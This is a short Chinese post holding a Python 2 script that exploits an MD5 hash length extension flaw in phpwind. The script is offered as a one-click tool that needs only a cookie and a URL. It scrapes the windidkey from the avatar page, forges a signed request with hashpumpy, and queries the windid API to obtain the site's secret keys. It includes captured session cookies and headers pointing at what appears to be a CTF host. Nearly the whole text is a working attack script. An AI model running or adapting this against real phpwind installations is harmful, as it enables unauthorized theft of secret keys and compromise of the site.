利用md5 length extension attack
,具体分析文章:https://www.leavesongs.com/PENETRATION/phpwind-hash-length-extension-attack.html
phpwind获得secretkey一键化脚本,填写一下cookie和url就可以获得secretkey
#coding=utf-8
import urllib
import urllib2
import time
import cookielib
import gzip
import StringIO
from bs4 import BeautifulSoup
import re
import hashpumpy
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
def get_key(url):
url = url + '/?m=profile&c=avatar&_left=avatar'
response = opener.open(url)
html = response.read()
if response.info().get('Content-Encoding') == 'gzip':
stream = StringIO.StringIO(html)
with gzip.GzipFile(fileobj=stream) as f:
html = f.read()
soup = BeautifulSoup(html, 'lxml')
key_url = soup.find('param',attrs={'name':'FlashVars'}).get('value')
key_url = urllib.unquote(key_url)
rule = 'uid=(.+?)&windidkey=(.+?)&time=(.+?)&clientid=(.+?)&type'
Pattern = re.compile(rule, re.S)
rs = re.findall(Pattern, key_url)
return rs[0]
def padding_exten(windidkey,time,uid):
hexdigest = windidkey
original_data = time+'adoAvatarcavatarmapitypeflashuid'+uid+'uidundefined'
data_to_add = 'alistcappmapi'
key_length = 32
result = list()
rs = hashpumpy.hashpump(hexdigest,original_data,data_to_add,key_length)
result.append(rs[0])
tmp = str(rs)
tmp = tmp.split(',')[1]
tmp = tmp.split("\'")[1]
tmp = tmp.replace('\\x','%')
rule = 'undefined(.+?)alist'
Pattern = re.compile(rule, re.S)
tmp = re.findall(Pattern, tmp)
result.append(tmp[0])
return result
if __name__ == '__main__':
url = 'http://192.168.0.100/phpwind'
cookie = 'CNZZDATA1257835621=169451052-1472798292-null%7C1472798292; PHPSESSID=5adaadb063b4208acd574d3d044dda38; ECS[visit_times]=5; csrf_token=ab686222777d7f80; xzr_winduser=PbUcCS1OT1ZjCzY8GoJOV8EOvix9OdGpc%2BmWBPYV6ar07B7AZSOhSw%3D%3D; xzr_lastvisit=7%091475751418%09%2Fphpwind%2F%3Fm%3Dprofile%26c%3Davatar%26_left%3Davatar; xzr_visitor=cx59FPbNJ4FYG2e9cWKpUP%2FTZTef7Yu4DTFLTftwwZ%2FPEVo8'
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders.append(
('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'))
opener.addheaders.append(('Accept', '*/*'))
opener.addheaders.append(('Accept-Language', 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3'))
opener.addheaders.append(('Accept-Encoding', 'gzip, deflate'))
opener.addheaders.append(('Connection', 'keep-alive'))
opener.addheaders.append(('Cookie', cookie))
opener.addheaders.append(('Host', '106.75.33.217:5888'))
opener.addheaders.append(('Referer', 'http://106.75.33.217:5888/rob.php?id=740'))
opener.addheaders.append(('Cache-Control', 'max-age=0'))
uid, windidkey, time, clientid = get_key(url)
windidkey, padding = padding_exten(windidkey,time,uid)
payload = '/windid/index.php?time='+time+'&windidkey='+windidkey+'&clientid='+clientid+'&adoAvatarcavatarmapitypeflashuid'+uid+'uidundefined='+padding
url = url + payload
data = {'m':'api','c':'app','a':'list'}
data = urllib.urlencode(data)
response = opener.open(url,data)
html = response.read()
if response.info().get('Content-Encoding') == 'gzip':
stream = StringIO.StringIO(html)
with gzip.GzipFile(fileobj=stream) as f:
html = f.read()
print html